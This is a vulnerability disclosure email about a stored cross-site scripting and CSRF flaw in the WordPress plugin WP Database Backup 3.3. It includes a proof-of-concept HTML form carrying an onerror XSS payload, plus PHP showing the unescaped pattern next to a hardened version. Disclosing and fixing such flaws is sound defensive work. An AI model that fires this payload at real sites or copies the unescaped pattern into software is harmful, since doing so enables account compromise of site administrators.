Subject: Persistent Cross-Site Scripting (XSS) in WP Database Backup 3.3
Date: Thu, 20 Aug 2015 15:22:30 +0200

Hello,

Plugin: WP Database Backup 3.3 https://wordpress.org/plugins/wp-database-backup/

1. Persistent Cross-Site Scripting (XSS)

Authenticated administrators can store arbitrary HTML/JavaScript code in the FTP destination settings, which is later rendered unescaped in the admin page; the settings form also has no CSRF protection.

Method: POST
Url: http://localhost/wp-admin/tools.php?page=wp-database-backup
Vulnerable parameters: backupbreeze_ftp_host, backupbreeze_ftp_user, backupbreeze_ftp_port, backupbreeze_ftp_pass, backupbreeze_ftp_subdir

Example PHP callstack:
/wp-database-backup/includes/admin/Destination/FTP/ftp-form.php:135

Verification:
--
<form method="POST" action="http://localhost/wp-admin/tools.php?page=wp-database-backup">
<input type="text" name="backupbreeze_ftp_host" value='"><img src=x onerror=alert(1) /> XXXXXXXXXX' />
<input type="text" name="backupbreeze_ftp_hidden" value="Y" />
<input type="submit" />
</form>
--
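For comparison, here is an added example (written for this report, not code from the WP Database Backup plugin) of how the form rendering and save handler for the parameters listed above can be hardened: the stored values are escaped with esc_attr() on output, the save handler is protected by a capability check and a nonce (CSRF token), and each field is sanitised before it is stored. The option names, the nonce action name and the hidden-field trigger are assumptions for illustration.

```php
<?php
// Added example, not the plugin's code. Option names, the nonce action
// 'wpdb_backup_ftp_settings' and the nonce field name are assumptions.

// Vulnerable pattern: the stored value is echoed directly into a
// value="..." attribute. A stored "><img src=x onerror=...> closes the
// attribute and injects markup into the admin page (stored XSS).
function vulnerable_ftp_field( $name ) {
    $value = get_option( $name, '' );
    echo '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

// Hardened rendering: esc_attr() encodes quotes and angle brackets, so a
// stored value can no longer break out of the attribute. Output escaping
// is the actual fix; input sanitisation below is defence in depth.
function hardened_ftp_field( $name ) {
    $value = get_option( $name, '' );
    printf(
        '<input type="text" name="%s" value="%s" />',
        esc_attr( $name ),
        esc_attr( $value )
    );
}

function hardened_ftp_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'tools.php?page=wp-database-backup' ) ) . '">';
    // Nonce tied to the logged-in user's session: a cross-site POST cannot
    // supply it, which closes the CSRF hole.
    wp_nonce_field( 'wpdb_backup_ftp_settings', 'wpdb_backup_ftp_nonce' );
    $fields = array(
        'backupbreeze_ftp_host',
        'backupbreeze_ftp_user',
        'backupbreeze_ftp_port',
        'backupbreeze_ftp_pass',
        'backupbreeze_ftp_subdir',
    );
    foreach ( $fields as $name ) {
        hardened_ftp_field( $name );
    }
    echo '<input type="hidden" name="backupbreeze_ftp_hidden" value="Y" />';
    submit_button( 'Save FTP settings' );
    echo '</form>';
}

// Hardened save handler: capability check, nonce check, then per-field
// sanitisation before anything is written to the options table.
function hardened_ftp_save() {
    if ( ! isset( $_POST['backupbreeze_ftp_hidden'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // Dies with a 403 when the nonce is missing or invalid.
    check_admin_referer( 'wpdb_backup_ftp_settings', 'wpdb_backup_ftp_nonce' );

    // Free-text fields: strip tags, NUL bytes and surrounding whitespace.
    foreach ( array( 'backupbreeze_ftp_host', 'backupbreeze_ftp_user', 'backupbreeze_ftp_subdir' ) as $name ) {
        $raw = isset( $_POST[ $name ] ) ? wp_unslash( $_POST[ $name ] ) : '';
        update_option( $name, sanitize_text_field( $raw ) );
    }

    // Password: keep punctuation intact but remove tags; it is still
    // escaped with esc_attr() whenever it is rendered.
    $pass = isset( $_POST['backupbreeze_ftp_pass'] ) ? wp_unslash( $_POST['backupbreeze_ftp_pass'] ) : '';
    update_option( 'backupbreeze_ftp_pass', wp_strip_all_tags( $pass ) );

    // Port: allow only an integer in the valid TCP range, default 21.
    $port = isset( $_POST['backupbreeze_ftp_port'] ) ? absint( $_POST['backupbreeze_ftp_port'] ) : 21;
    update_option( 'backupbreeze_ftp_port', ( $port >= 1 && $port <= 65535 ) ? $port : 21 );
}
```

With this change the verification form above still submits, but the request is rejected at check_admin_referer() because it carries no valid nonce, and even a value that reaches the database is rendered as inert text rather than as markup.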


--
Regards,
Marcin Probola,